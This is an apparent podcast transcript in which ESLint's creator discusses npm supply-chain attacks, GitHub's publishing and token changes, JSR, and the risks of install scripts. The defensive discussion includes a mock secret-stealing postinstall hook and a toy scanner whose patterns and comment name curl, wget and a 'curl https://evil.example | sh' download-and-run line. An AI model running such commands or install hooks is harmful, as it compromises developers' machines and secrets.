The Changelog: Software Development, Open Source - Securing npm is table stakes (Interview)
Episode Date: January 29, 2026
As the creator and long-time maintainer of ESLint, Nicholas Zakas is well-positioned to criticize GitHub's recent response to npm's insecurity. He found the response insufficient, and has other ideas on how GitHub could secure npm better. On this episode, Nicholas details these ideas, paints a bleak picture of npm alternatives like JSR, and shares our frustration that such a critical piece of internet infrastructure feels neglected.
Transcript
Welcome, friends. I'm Jerod and you are listening to The Changelog, where each week we interview the hackers, the leaders, and the innovators of the software world.
As the creator and longtime maintainer of ESLint, Nicholas Zakas is well positioned to criticize GitHub's recent response to NPM's insecurity.
He found their response insufficient and has other ideas on how GitHub could secure NPM better.
On this episode, Nicholas details his ideas, paints a bleak picture of NPM alternatives like JSR, and shares our frustration that such a critical piece of internet infrastructure feels neglected.
But first, a big thank you to our partners at fly.io, the platform for devs who just want to ship. Build fast, run any code fearlessly at fly.io.
Okay, Nicholas Zakas, talking NPM on the Changelog. Let's do it.
This is the year we almost break the database. Let me explain. Where do agents actually store their stuff? They've got vectors, relational data, conversational history, embeddings, and they're hammering the database at speeds that humans just never have before.
And most teams are duct-taping together a Postgres instance, a vector database, maybe Elasticsearch for search. It's a mess. Well, our friends at TigerData looked at this and said,
what if the database just understood agents? That's Agentic Postgres.
It's Postgres built specifically for AI agents, and it combines three things that usually require three separate systems.
Native Model Context Protocol (MCP) servers, hybrid search, and zero-copy forks.
The MCP integration is the clever bit: your agents can actually talk directly to the database. They can query data, introspect schemas, execute SQL, without you writing fragile glue code. The database essentially becomes a tool your agent can wield safely.
Then there's hybrid search. TigerData merges vector similarity search with good old keyword search into a single SQL query. No separate vector database, no Elasticsearch cluster; semantic and keyword search in one transaction, one engine.
Okay, my favorite feature: the forks. Agents can spawn sub-second, zero-copy database clones for isolated testing. This is not a database they can destroy. It's a fork. It's a copy of your main production database, if you so choose. We're talking a one-terabyte database forked in under one second. Your agent can run destructive experiments in a sandbox without touching production, and you only pay for the data that actually changes. That's how copy-on-write works.
All your agent data, vectors, relational tables, time series metrics, conversational history,
lives in one queryable engine.
It's the elegant simplification that makes you wonder why we've been doing it the hard way for so long.
So if you're building with AI agents and you're tired of managing a zoo of data systems, check out our friends at TigerData at tigerdata.com. They've got a free trial and a CLI with an MCP server you can download to start experimenting right now.
Again, tigerdata.com.
Well, friends, we're here with our new friend and good friend, Nicholas Zakas. Known for many things: created ESLint, author of many books, and a person out there with some angst, you know.
So who doesn't have a little angst out there?
Yeah, we all got some angst.
But this one recently against GitHub's stewardship and securing of NPM,
which I know a lot of people have an issue with.
So when I saw this post and I read this post,
I got to get you on the podcast.
So here you are.
Welcome to the show.
Yeah, thanks for having me.
I think thanks for having me back.
I think I've been here before.
JS Party, maybe, right, Jerod? JS Party?
You know, we were talking about it yesterday,
and I know him online.
I feel like I've met him before,
but I didn't actually go back in our catalog
and look you up.
So I would only assume it was either
an old, old episode of the Changelog
or a not-quite-as-old episode of JS Party,
but for sure you've been on the network.
Yes, definitely.
I wasn't on the podcast.
That's why I said that.
Then welcome to the podcast.
Yeah, welcome to the both of us and the three of us.
What is the best way to open this can of worms,
honestly?
I mean, should we go to the end and work our way back? How should we begin this discussion on securing NPM and what GitHub can do about it?
Yeah, that's a good question. I think it might help to talk a little bit about 2025 and what was
going on with NPM then, and then we can jump off from there. So in September alone, there were
500 packages that were compromised on NPM, never mind the rest of the year, just 500 packages in that one month.
And those attacks didn't really look any different than any of the attacks that we've seen before,
which is basically like somebody steals some credentials one way or another.
They start publishing compromised packages.
They usually add like a pre-install or a post-install script that executes the malicious code.
and then they publish that to the registry,
and they just wait for people to download it.
And then as it downloads and that pre-install or post-install script runs,
that's when the trouble starts happening.
And we've seen a bunch of different iterations of this.
Sometimes it just is like looking to steal crypto.
Other times it's looking for secrets.
I mean, that was one of the big things last year: running TruffleHog to discover secrets on the user's machine
and then using those secrets to propagate itself.
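To make the shape of these attacks concrete, a hypothetical compromised manifest might look something like this (the package name, version, and script are invented for illustration):

```json
{
  "name": "some-popular-utility",
  "version": "4.2.1",
  "scripts": {
    "postinstall": "node collect-secrets.js"
  }
}
```

That postinstall entry runs automatically during npm install, which is exactly the execution hook these attacks rely on.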
And I think that we're pretty lucky so far
that the damage caused by these packages
has been pretty minimal.
I think one person lost like $500 in crypto
or something like that.
But it was getting to the point
where to me it's looking a lot like
somebody or a bunch of somebodies
are trying to figure out how to get packages into NPM
that will get distributed as quickly as possible
to do something that is a lot more damaging
than what we've seen so far.
And that was basically what led me to stop and think about
what's actually going on with NPM,
what could change,
and I think more like
what could the next attack look like if things don't change?
And from a maintainer's perspective as well, right?
Because you're looking at it from the lens of somebody who's maintaining highly used open source projects over the course of forever, right?
Yeah.
So, like, ESLint, which I help maintain, has over 200 million downloads a month.
And we have had from time to time these very mysterious pull requests that show up where all it is is somebody, like, changing a dependency with no description or anything.
And when we ask them, hey, like, what are you trying to do on this?
What's the point of this pull request?
We get nothing.
It doesn't happen a lot, but it's happened frequently enough
that it's always felt to me like a penetration test to see
how easy it would be to land a pull request on ESLint
because it's downloaded so much.
And knowing that it's going to go out basically immediately
to all kinds of stuff: CI systems and personal laptops and what have you.
We're always very, very careful about changing dependencies
and thinking about which dependencies we want to add into the ESLint package.json file.
Because there is a big responsibility when you have a package that's downloaded so frequently
by so many different people.
And it just kept coming back to like,
No matter what I'm doing, no matter what security practices we're putting into place,
it seems like there's always some way for somebody to get in and cause trouble.
And we did have, I want to say maybe nine or ten years ago,
we did actually have a compromised package get into ESLint,
but it was one of our own packages, and it was kind of traditional:
Somebody had reused their credentials on another site.
That site had been hacked, and they ended up having their NPM credentials stolen as a result,
and then they could publish ESLint packages using that.
After that, we changed things so that nobody's individual NPM account has publish rights for ESLint packages.
But we're still in this situation where, like, we use so many dependencies,
and not to mention, like, dependencies of dependencies,
that it's almost impossible to protect our users
if some malicious package gets in the dependency tree somehow.
So GitHub did respond to this,
or they have done some changes.
I don't know if it was in response, or if the timing was just such that it seemed like it was in response.
We had Feross Aboukhadijeh on the show
last year talking about just the onslaught
and some of the details of those hacks,
and it was fun to hear about how the hackers
do their hacking.
And at the time, I think GitHub had announced some changes but hadn't actually done them yet or rolled them out.
You addressed some of those from a maintainer perspective.
It seems like your read on the GitHub changes to the way it works is more maintainer
burden and perhaps too tightly scoped.
Is that fair to say?
Or we want to give your impressions of some of the things they're doing to react to this
because they're in the position as the platform to be the most influential reactor.
Or are they the ones that have to basically make some changes, right?
Yeah. So my read on the changes that they made was that it was pushing more
responsibility onto maintainers. So eliminating the kind of older style tokens, I can understand
fine-grained tokens are way more secure. Like that makes sense. But then limiting the lifetime
of those tokens, they went through a bunch of iterations. I think they finally landed
on like 90 days, that alone, like if you're doing token-based publishing, like now you need to
remember to update your tokens every 90 days or you have to implement some sort of automation
to do it for you on top of whatever else you're already doing. And the response to that was,
well, if you use trusted publishing, the Open ID Connect feature that they have in GitHub Action,
then you don't need to actually store a token anymore.
It's generated on the fly,
and you can just publish using that.
And that sounds great.
Like it's a good solution to not just have a token laying around
that somebody can use.
It's kind of a lock-in thing, though, right?
It's kind of a lock-in thing.
Well, it is.
I mean, number one, that's great if you're on GitHub
or GitLab also supports it,
but what if you're not on either of those platforms?
Right.
Like not every company in the world that's publishing NPM packages is using GitHub.
They might have private repositories.
They might be publishing directly from their internal repositories and not having stuff out on GitHub or GitLab.
And then the other problem is that there's no two-factor authentication for trusted publishing.
And as a result, the OpenJS Foundation even came out and just said, for critical packages,
we recommend that you don't use trusted publishing
because if somebody is able to get access to your GitHub repo,
all of a sudden they're going to be able to publish your packages
and you won't know until it's too late.
So trusted publishing is the beginning of a good solution.
It's just not all the way there yet.
Can you break that down?
What exactly is trusted publishing?
Yeah.
How do you explain that?
So trusted publishing is basically you go into NPM and for your individual package, you say,
I want to enable trusted publishing from this source code repository specifically, and then this
workflow specifically, the exact name of the file.
And when you enable that, then you can upload your GitHub Actions workflow file into your repository and set the permissions for the ID token.
And then GitHub Actions, when it runs that workflow, will request a token on your behalf from NPM and then bring it back in and use it just for as long as the workflow is running. And then that token is no longer useful anymore. Basically, it's on-demand, one-time-use tokens for NPM.
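For readers who want to see the shape of this, here is a minimal sketch of such a workflow, assuming a recent npm CLI with OIDC support; the filename, trigger, and versions are illustrative, and the repository plus this exact workflow name must first be registered for trusted publishing on npmjs.com:

```yaml
# .github/workflows/publish.yml (hypothetical; must match the workflow
# name registered for trusted publishing on npmjs.com)
name: Publish
on:
  release:
    types: [published]
permissions:
  id-token: write   # lets the job request a short-lived OIDC token
  contents: read
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 22
          registry-url: "https://registry.npmjs.org"
      - run: npm ci
      - run: npm publish   # a recent npm exchanges the OIDC token itself; no stored secret
```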
Is that used by a lot of maintainers?
Is it... well, it's not fully implemented though, right?
Well, so it's partially implemented now without two-factor authentication.
That's the big thing that's missing.
And there are a lot of people who are moving to it,
specifically because they don't want to have to deal with rotating tokens every 90 days.
That's just a lot of work.
and especially if you consider, like, I think for me,
I might be a maintainer for something like 100 packages,
maybe more than that, I'm not sure.
Some of them are pretty small and inconsequential,
but sometimes those are the ones that make their way
into larger dependency trees,
and it can get in trouble with those.
And so the initial reaction from myself and a lot of maintainers,
when we read the post about the change,
was like, how are we going to scale this?
How am I going to update all of these packages to do all of this?
And there was no batch operation to update a bunch of packages.
You have to go in individually to each package and go through like multiple two-factor
authentication approvals as well just to do it for one package.
And I've been told that there's going to be a batching tool coming out.
It's still not there yet.
But in the meantime, they still rolled out these changes fairly quickly to people
to kind of force changing over to the granular tokens with shorter TTLs
and the trusted publishing.
And so there were just a lot of maintainers saying, you're just throwing a ton of work onto our plates, and the tools to help us do that work aren't even there yet.
Can you walk through why trusted publishing is trusted?
What makes that trusted with this part of the workflow?
Like the single workflow YAML file in Actions, what makes that trusted?
Yeah, so it's trusted because it is known ahead of time that that is the one location
that you can publish from.
Like any other workflow that you add, you can ask to get the ID token and publish to NPM, but that workflow is untrusted.
So it can't actually use a token to publish to NPM.
So it ends up being just a form of validation between that workflow and NPM to validate
that it is allowed to publish that package.
So the, I guess, pre-ceremony, the PITA factor of this pre-ceremony, is what makes it more trustable, because you're going to go through the motions of actually setting it up, naming it, defining it, putting it in the repo. There's some sort of song and dance between GitHub and
NPM to trust that singular YAML file, and that's the one that's trusted, that workflow.
Yeah, which again, like is actually a nice system. If you're on GitHub or GitLab
and you don't worry too much about needing two-factor authentication, it's a decent system. But to me, again, it's still GitHub and NPM saying, like, okay, maintainers,
like, you need to do more to protect everybody from you being a victim of your credentials being
stolen, which is why in my post, I use the analogy of credit cards where, like, there's a lot
of fraud using credit cards. And that's why credit card companies keep introducing new ways of validating that you're the authorized user of the card
that you're using, whether that be the CVC number on the back or the chip that is in the
card, or, in Europe, needing to enter a PIN in addition to your chip.
They do all of that stuff to hopefully prevent people from using your credit card number
without your permission, which again, is great.
Like, we should do that.
There needs to be some way to help consumers of credit cards, users of NPM, to protect
themselves from having their information stolen.
But credit cards don't just stop there.
They're also doing anomaly detection with each transaction that's coming through to figure
out, like, does that look like something you would normally do? And so if you've ever been traveling
or just make a big purchase, you may get a text message that says, hey, we just got this charge
for this amount at this location. Was this you? And if you say yes, it says great, you know,
go right ahead. If it says no, then it will block the transaction and they start the fraud
investigation process.
And that way, they know that, hey, nobody's going to be 100% at protecting their information
from being stolen for a variety of reasons.
So let's not just rely on that.
Let's also do some analysis and see if we can figure out if something bad is going
on before it gets too far down the line.
And that's where I think that NPM has been kind of missing some clear actions that they could be taking to protect us better.
What makes you think they're not doing that already and just doing it poorly?
Well, from what I can tell, they have some ability to do this because they said in one of their
blog posts that once they identified the pattern of the credential stealing attack, then they were
preventing new packages from being uploaded that had that same kind of signature.
So they do have that capability to do like a real-time analysis of packages as they're being
uploaded.
But it just doesn't appear that they're doing much else with that capability just because of
how frequent the attacks have been.
Like if it was like, oh, like once a year, it's like, well, maybe like during those 11 months,
they were kind of tweaking some knobs and twisting some things and trying to figure stuff out.
But it was like every single month, another attack almost doing the exact same thing.
And then later them coming in and saying like here's what we did to clean up the mess.
And I just feel like the technology is there to prevent the mess before it happens.
and for whatever reason, I'm guessing, probably lack of resourcing, that it's just not getting done.
Because I have talked with folks who work on NPM, like, they're really dedicated, they're really smart.
And the sense that I always get is just like there's a really big backlog, there's not enough people to work on it.
And so the stuff just kind of sits until there's an emergency.
And my read on the response last year,
And I have no inside knowledge of this at all.
This is just my interpretation of what I was seeing,
was that the things that they were rolling out
were things that were probably already on their roadmap
and just needed a little push.
And this was the push of like, you know,
running it up the chain and just saying,
hey, these like three things we've been trying to get through for the past nine months.
Like this would actually really help with these attacks.
So can we prioritize and resource these?
And that's why we got those.
Again, just my theory.
But it just, it seems like, and I gave this feedback directly to them too, that I just feel like all of this is attacking the problem from the wrong end at this point.
Well, friends, I don't know about you, but something bothers me about GitHub Actions.
I love the fact that it's there.
I love the fact that it's so ubiquitous.
I love the fact that agents that do my coding for me believe that my CI/CD workflow begins with drafting YAML files for GitHub Actions.
That's great.
It's all great.
Until, yes, until your builds start moving like molasses.
GitHub Actions is slow.
It's just the way it is.
That's how it works.
I'm sorry.
But I'm not sorry because our friends at Namespace, they fix that.
Yes, we use namespace.so to do all of our builds so much faster.
Namespace is like GitHub actions, but faster.
I mean, like way faster.
It caches everything smartly.
It caches your dependencies, your Docker layers, your build artifacts,
so your CI can run super fast.
You get shorter feedback loops,
happy developers because we love our time,
and you get fewer "I'll be back after this coffee when my build finishes" moments, because that's not cool.
The best part is it's drop-in.
It works right alongside your existing GitHub actions with almost zero config.
It's a one-line change.
So you can speed up your builds, you can delight your team,
and you can finally stop pretending that build time is focus time.
It's not.
Learn more.
Go to namespace.so.
That's namespace.so.
Just like it sounds, like I said.
Go there, check them out.
We use them.
We love them.
And you should too.
Namespace.
Well, there's one big difference between the credit card companies and GitHub slash Microsoft.
Otherwise, I agree with you entirely with the methodology of, like, you know, inference and fraud detection, analysis, being more proactive than reactive, etc.
It's that the credit card companies get paid per transaction, you know?
So like there's money directly tied to that process.
And what is NPM to GitHub, to Microsoft? You know, it seemed like it was a fig leaf at a time when NPM needed one, you know, to continue to exist. And so, acquisition. But where is the revenue coming from?
Like what, what's it doing for GitHub? What's it doing for Microsoft? And so I understand,
although we tend to get cynical over time, I understand why it's hard to actually allocate more
resources because it's like, this is not their main thing. It's not even their like seventh main thing.
It's just like a thing that they have that's hanging off another thing that they bought.
Like they bought the GitHub and they got the NPM and they're like, well, you know, like I understand.
For the rest of us, it sucks.
And what do they lose?
When we have these, they lose a little bit of goodwill, right?
A little brand tarnishment, but not much.
They're not losing enough trust that they're not making money on transactions where it's like credit card companies.
You got to trust that credit card company in order to actually use their card.
And for Microsoft, you know, if there's another NPM security breach, I'm sure they don't like it. Nobody likes it. But it's not revenue generating. And so how do you actually get that done? And that probably explains some of what you're sensing: the lack of resourcing is probably the reason why. I'm not sure
if we ever bridge that gap, you know, like how is it ever going to be worth it for them?
Yeah. And I think that's exactly the problem is that the NPM
registry is a huge cost sink.
It is wildly expensive to run, requires a ton of bandwidth.
All kinds of companies are relying on it every day running in their CI.
And when the NPM company, NPM Inc.
was running, like they needed to sell because they couldn't afford to run the registry
anymore.
Right.
And it really was GitHub being like, hey,
we are a haven for JavaScript developers.
They didn't have to do that.
They didn't need it.
Because at the time, I think it was just a few months earlier,
they had actually announced their own NPM compatible registry
built into GitHub, which is still there,
but it doesn't seem like people use all that much,
except maybe as, like, private registries inside of companies.
So they didn't really need to buy NPM.
I don't know who would have bought it.
otherwise.
But at the same time,
it's like, you know, if you adopt a dog,
you should take care of the dog.
We all agree on that.
Like, you can't just adopt it.
Take care of the dog, GitHub.
Well, I mean, I think they would argue,
well, we are taking care of it.
We have a staff of three and that's their entire job.
And we're paying, I just made that number up.
But, you know, like, well, there's three people,
full timers.
We can calculate that out.
We're talking a million dollars a year just to keep the dog alive, you know, or whatever the number is.
Yeah, yeah, absolutely.
And it's not going to get better than that.
They're not going to go to two million.
There's no reason to as long as the dog's still alive.
Now, maybe it gets so bad, the dog eventually dies.
Right.
Well, so my counter to this argument, which I completely understand,
is that all it takes is one attack that costs people millions of dollars
in some way or costs a company millions of dollars before this becomes not just a like,
oh yeah, hey, we're keeping it alive.
But, you know, like there's a responsibility because if you don't take care of that dog,
it's going to start biting everybody in the neighborhood.
And then you're looking at not just like, oh, this is, you know, it tarnishes our reputation.
Like it doesn't look good.
Now you're looking at, like, significant financial repercussions. And, you know, I'm sure there's stuff in the terms of service that says that they can't be sued, but...
That's, I was just going to ask, like, could you actually go after them legally for negligence or something?
But, you know, there still might be some big company out there that's like, hey, you know what, we're just going to try it, because we're a, you know, multi-billion-dollar company and we have the money to throw at lawyers, and why not?
We'll give it a shot and see what happens.
But this has been my concern for several years now is that when you treat these attacks as a nuisance,
you leave the door open for more sophisticated attacks that are going to cause more trouble in the future.
And I don't know what those look like.
I mean, I could imagine another type of situation where we had, you know, the crypto stealing package.
Like, what if that wasn't targeting a crypto website?
Like, what if that was targeting like a major banking website or a major stock exchange website?
What would happen in that situation?
and would those people who lost money through an NPM package that was compromised,
would they even understand what was going on?
Or would it just be like, oh, by virtue of being on the laptop,
I just got screwed?
So I feel like that bigger attack is coming if something major doesn't change.
It's likely, right?
I mean, it's likely that a large player in some game with, you know, deep implications is using dependencies from Git or NPM. It's, you know, it's like a 99% likelihood that someone's using it somewhere on the front end and it's an attack vector.
You may already be exploited, right?
Yeah, you may, you know, these little pokes may actually be just a precursor.
Nicholas, do you have any insight into how staffed NPM is given your presence in the community?
I don't. I've only had direct contact with one person, and I don't feel at liberty to discuss
what we've talked about, but I don't have an idea of how big the team is. My only sense is that
it's fairly small.
I would say demystify the black box of staffing,
just so the community knows.
Yeah.
Is it being staffed?
Is it understaffed?
Is it, you know, like, I don't know.
I mean, if we're relying on this registry and ecosystem,
at least be clear on what is what's not clear with that part of it.
Like, tell us.
Yeah.
I mean, it's, I think last year I opened up an issue on NPM.
And maybe by the end of the year, it got a response, like, not even a like, oh, this is a good idea, this is a bad idea, just that like, oh, hey, that's interesting.
And that was a good indicator to me that it was probably not resourced appropriately.
I mean, especially when, like, pnpm came out after one of the attacks and was like, okay, we're not going to let people install any package that's, like, newer than seven days
or something, in the hopes that that would prevent people from rapidly downloading
compromised packages before they could be caught and removed.
And that pnpm moved faster than NPM, I think, was a bit of a wake-up call for me.
Now, they're doing it on the client side, so, you know, how big of an effect does that have?
I would guess, like, not huge.
But they were trying to do something that seemed like it might help and was within their power to do so,
which I applaud them for.
And like with NPM, it just felt a little like,
okay, this was some stuff that we were planning on doing anyway,
and we're just going to roll those out.
And yeah, we'll see what happens.
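For reference, the seven-day delay Nicholas describes shipped in pnpm as a configurable setting; a hedged sketch of the configuration (the key name and placement are from memory, so check pnpm's docs for the exact spelling and defaults):

```yaml
# pnpm-workspace.yaml (illustrative; the value is in minutes)
minimumReleaseAge: 10080   # skip versions published within the last ~7 days
```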
Yeah.
Let me ask a question that's maybe been asked,
but maybe not directly like this.
Like, is it still prudent to even use NPM,
given like the fact that you put an issue
out there and it took that long to get a response, or just the seemingly lack of speed or initiative on the nuances. Like, I don't think security is a nuance, but you'd mentioned that they're a nuisance, which is a close word to that. You know, what's going on? I mean, should we keep using NPM? Are there alternatives? Should we create an alternative? If it was a possibility, what would that organization look like? Do you have any insights there?
Yeah, so I think the short answer
is that the inertia behind NPM is so great
that it's very difficult to extricate ourselves from it at this point.
Like any, I mean, any JavaScript package that you want to install,
you look at the ReadMe, it says install from NPM.
People don't even know what else to do besides go to NPM
to look for these packages.
And, you know, Deno started an alternative package registry,
called JSR, which I actually had high hopes for because I think that they put the type of thought
into security and stability and stuff like that up front that NPM has kind of been adding on as it goes.
Just like right from the start, not allowing package name squatting, reserving certain
package scopes that could be confusing to people.
Like when I went to go sign up for JSR and I tried to grab the ESLint scope because my
initial reaction was like, oh, God, like, here's another place that I need to grab all
the usernames on.
And ESLint had been reserved.
Like you couldn't actually go on the website and just say like, okay, I want the ESLint
scope.
You actually had to apply for it and prove that you're the right person to be handling that scope.
And they approved me really quickly because they knew who I was and that I was involved
with ESLint. So I was able to get that. They had trusted publishing right from the
start or else you have to use two-factor authentication to publish locally.
They had, you know, no pre-install or post-install scripts. There's just a lot that was really good
about JSR, and it basically suffered the same fate as NPM, just on a much faster timeline,
which was basically, you know, there was a lot of, like, a lot of interest early on, a lot of
activity, a lot of iteration. Like, I was filing issues on the JSR GitHub repo. They were getting
answered, like, sometime within hours, and things just getting fixed and pushed out. But
eventually that timeline started expanding to the point where I wasn't getting any responses anymore.
Even to bug reports. I mean, I was finally able to get one response when a new version of Deno was pushed out and that broke the JSR command-line tool, and I was able to get a response from them to get that fixed fairly quickly.
They had announced that it was going to be an open governance registry for JavaScript,
and they had formed a committee that had people from, like, NPM, and Deno, and I think the OpenJS Foundation and vlt,
and that just kind of went nowhere.
There hasn't been any updates since then.
Like, JSR is still running, but as far as I can tell, it's mostly an abandoned project at this point.
And there are just some of the Deno diehards who really like to use it, but it doesn't seem like it's ever going to be real competition for the NPM registry.
What is the downside to pre- and post-install hooks?
I get what they do.
But what is the downside?
You said there's none on JSR.
Is that something you agree with?
Is there a way to do it safely?
What are your thoughts?
So pre-install and post-install scripts on NPM are designed to let you run additional commands after install in order for a package to work.
And NPM was based on a package manager at Yahoo, where I worked for five years, called Yinst.
And yinst was the way that all of the machines were built inside of Yahoo. And these pre-install and post-install scripts could run in yinst to help you set things up after you got resources installed.
And that turned out to be pretty helpful to be able to set up machines.
That was copied over into NPM with the same idea.
The difference, though, is that yinst was an internal system, so there was implicit trust with all of the packages that were published in yinst.
For NPM being a public system, you don't have that implicit trust.
And I think that this is probably something Isaac would have rethought when he was designing the system,
knowing what he knows now.
But the NPM ecosystem kind of became dependent on those scripts.
because of the ability to publish native NPM packages
that were actually compiled like C, C++ packages
where you can't publish the compiled artifact itself
because it has to be compiled individually for each machine.
And so these post-install scripts are what allow these native modules
to be used and installed on any machine
because it just downloads the source code
and then on your machine it compiles it
into the form that can be used
and then you can just run it.
And there are a lot of packages that use that now
because every once in a while somebody will say like,
well, we'll just ban, like, pre-install and post-install scripts,
but if you do that, you kill off a non-trivial portion
of packages on NPM that people are relying on.
And the other thing about that is you can actually say, you know, npm install --ignore-scripts, and it won't run any of those scripts.
And that's a great solution unless you end up with one of those packages in your dependency tree that needs to be compiled and you might not even be aware of it.
And so just disabling that or just always saying, like, don't run those scripts, that also has the effect of potentially breaking people's experiences in ways that they didn't anticipate.
And if you've ever had any trouble with a deep dependency that needs to be compiled that wasn't compiling, it is really difficult to debug.
And so I think any package manager that would start from scratch, or any registry that would start from scratch now, would be wise to not even have this concept of pre-install and post-install scripts and just say, you know, we're not dealing with compiled packages at all, which is what JSR does.
But if you want to enable compiled packages, it's kind of the necessary evil you have to accept.
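For contrast with the malicious case, here is what the legitimate use conventionally looks like: a hypothetical native addon whose manifest triggers a local compile on install (node-gyp is the usual build tool):

```json
{
  "name": "example-native-addon",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node-gyp rebuild"
  },
  "dependencies": {
    "node-addon-api": "^8.0.0"
  }
}
```

Installing with npm install --ignore-scripts skips that rebuild step, which is precisely the deep-dependency breakage described above.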
Do you mean the post-install or pre-install is going to install a compiled binary,
and that's the threat, is that it's compiled and you can't see into it?
No, so the threat is that the pre-install and post-install can run anything.
Yeah, exactly.
Like, it might not compile anything.
And this is what happened last year: these packages would download and install TruffleHog,
which is a secret scanner, and just execute it and find all the secrets and tokens on your computer when you downloaded it.
It's one of those situations that, like, Deno was trying to prevent with its permission system,
like, okay, you have an NPM package.
Like, should it be able to call back out to the internet for some reason by default?
Like, that kind of seems like a bad idea.
And so the permission system in Deno was built so that any time a package was trying to do something that was unanticipated,
reach out to the network, read something on the file system,
you would have to opt into that behavior.
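A quick sketch of what that opt-in looks like in practice, using flags from Deno's documented permission model (the script names are invented):

```sh
# By default, Deno denies network and file-system access.
deno run script.ts                           # any net/fs access prompts or fails
deno run --allow-net=example.com script.ts   # grant network access to one host only
deno run --allow-read=./data script.ts       # grant read access to one directory only
```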
And I know there's been some experiments with that on NPM.
I don't think that those permissions actually apply
to pre-and-post-install scripts, if I remember correctly.
But that is something that they could look at as well.
of just, like, okay, maybe pre-install and post-install scripts are not allowed to just willy-nilly, like, go out to the internet.
Maybe they need to get like opt-in permission from the user in order to do that first.
I imagine that would be a little bit more complicated than I'm making it sound.
Yeah, but it's another option around this.
I mean, my preferred option, which I talked about in the post, is just say, hey, if a package
previously did not have a pre-install or a post-install script, and then it adds one, like, don't
allow it to be a patch or a minor version upgrade.
Like force it to be a major version upgrade.
Because for most people, that will not be installed automatically the way the minor and the patch versions are.
So if you just said like, oh, hold on, for this like 1.x branch of this package,
you never had a post-install script before.
And now you do, sorry, you've got to bump that to 2.0.0 before we're going to publish it for you.
And I think that that alone would slow down attackers tremendously.
Yeah.
Because people will just not automatically be downloading those packages anymore, and hopefully someone, maybe it's Socket or maybe it's NPM themselves, will then have the time to identify that as malicious and get it pulled down before it is downloaded millions of times.
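A sketch of the registry-side check Nicholas is proposing (not real NPM code; it assumes the registry can compare an incoming manifest against the latest published one, and it uses the semver package):

```ts
import semver from "semver";

interface Manifest {
  version: string;
  scripts?: Record<string, string>;
}

// True if the manifest declares any install-time hook.
const hasInstallHook = (m: Manifest): boolean =>
  Boolean(m.scripts?.preinstall || m.scripts?.install || m.scripts?.postinstall);

// Reject a publish that introduces an install hook without a major version bump.
function allowPublish(previous: Manifest, incoming: Manifest): boolean {
  const addsHook = !hasInstallHook(previous) && hasInstallHook(incoming);
  const majorBump = semver.major(incoming.version) > semver.major(previous.version);
  return !addsHook || majorBump;
}
```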
That's awesome to suggest. I like your idea, of course, as well. I think a major version bump is going to slow it down. It's not going to prevent publishing. It still allows movement, so if it's your package, you just move along, but anyone else has to sort of adopt that based upon their semver. But what if you were constantly scanning any package or project that had a pre- or post-install script? Anytime those were added or included, and forevermore, that one gets special attention, special scrutiny on that script. If you're base64ing something,
if you're doing something nefarious, if you're making a network call,
if you're doing an install of any sort, it's looked at
and it has to be scanned and verified, like a security verification,
so that at least you have some check and balance.
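A toy version of the heuristic Adam is sketching (illustrative only; real scanners like Socket do far more than pattern matching, and a hit should mean "route to human review," not "malicious"):

```ts
// Crude red flags for an install script: encoded payloads, network calls,
// spawned processes.
const suspiciousPatterns: RegExp[] = [
  /base64/i,                  // possible encoded payload
  /\b(curl|wget|fetch)\b/i,   // network access during install
  /child_process|exec\(/,     // spawning arbitrary commands
];

function needsReview(installScript: string): boolean {
  return suspiciousPatterns.some((pattern) => pattern.test(installScript));
}

// Example: needsReview("curl https://evil.example | sh") returns true.
```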
Yeah, I like that idea a lot.
I think that for too long, we've just been saying, like, oh, you know,
they go and add a post-install script, and gosh, like, that's terrible.
But, yeah.
I think it's great if it's done wisely.
I like the idea, you know, a lot.
But there are all kinds of things that I think can be done with these packages
to just make sure that they're safe.
And yeah, I love that idea of just providing extra scrutiny to those.
I mean, it could be the case that, like, you know, you even need, like, a waiting period
if you're changing or adding, you know, post-install scripts.
And this is the thing that I found a bit frustrating is I feel like there are some low-hanging fruit options that are out there that would actually not be very resource-intensive to implement on NPM, which is why my suggestion of just requiring a major version bump was one of the things that I put out there.
I don't think it's super complicated to implement.
But let's just start doing something during the published process
instead of just relying on people discovering it
after something has been published and then downloaded a bunch of times.
I mean, you can even introduce, I mean, you got verified publishing,
why not verified publishers?
You know, if you're going to give somebody the ability to, you know, make a token renewable in some way, shape, or form, or a just-in-time credential that makes sense for the maintainer, why not only give certain types of ability, like the pre- and post-install, for example?
If it's such a powerful thing, anyone who wants to use that, in addition to that, verify all maintainers or the organization or the maintainer,
the kind of core maintainer, have some sort of connection to one real person inside of that package, project, whatever.
And if you can't do that, then I'm sorry,
you don't get that very special ability
for this trusted network or should be trusted network.
It takes people though, right?
A lot of software can automate a lot of that, really.
I mean, you can do a lot with that process.
I think that the resources for that would probably be
fairly high and probably more than it could get in a short term.
Let me say that. I think if you're GitHub, though, right, if this is GitHub, which it is, then you have GitHub at the ready.
So for those publishers, one easy way you can do it, or one easier way, is you can leverage the existing need for securing GitHub, which is that the project or that person has to use GitHub auth.
So you have one person or somebody there. Like, you can leverage GitHub auth and all the security put behind GitHub itself to have one verified member, or at least one member, in the party.
Gotcha. Yeah. Yeah. Interesting. I think potentially an easier solution, which is a little bit heavy-handed, is you could just say, okay, all packages that have pre- and post-install scripts right now, you can keep doing it. Anybody else, you don't get to do it. We're basically
cutting that off now and saying that, you know, we're grandfathering in all those old packages
so they will continue to work.
But new packages, sorry, you're out of luck.
We're just not going to do it for you.
You need to figure out a different way to distribute stuff.
And you can just tell your users a couple steps before and after, right?
I mean, that's the easiest method that you could do: just tell your users,
you got to do something before and do something after to make this work right.
Yeah.
It's unfortunate.
Yeah, just go ahead and write your own shell script. Or, you know, here's the shell script, download it, and you need to run this,
and then after that, it's fine. Right. It's, yeah. But, you know, again, I feel like there are
some lightweight solutions that could be done instead of putting more responsibility on
maintainers every time there's an attack. Well, friends, this episode is brought to you by
Squarespace. I love Squarespace. I'm a user of Squarespace, and Squarespace is an awesome
all-in-one platform where you can stand up a professional site, offer paid services, get paid, the whole thing, without writing a single line of code or debugging CSS.
They've even got Blueprint AI now, which takes basic info about what you're building and generates a fully custom site with actual design recommendations.
Not a template you have to fight with, but a starting point that already looks like you thought about how it should look.
And for the data nerds out there, I know you.
That's me too.
Built-in analytics are cool.
See your traffic, see your revenue, see your bookings, see your sales.
Figure out where to focus all from one single dashboard, no third-party apps, no GDPR headaches.
Just there for you.
And whether you're launching a side project, selling a course, or finally replacing that under-construction web page you've been kicking around,
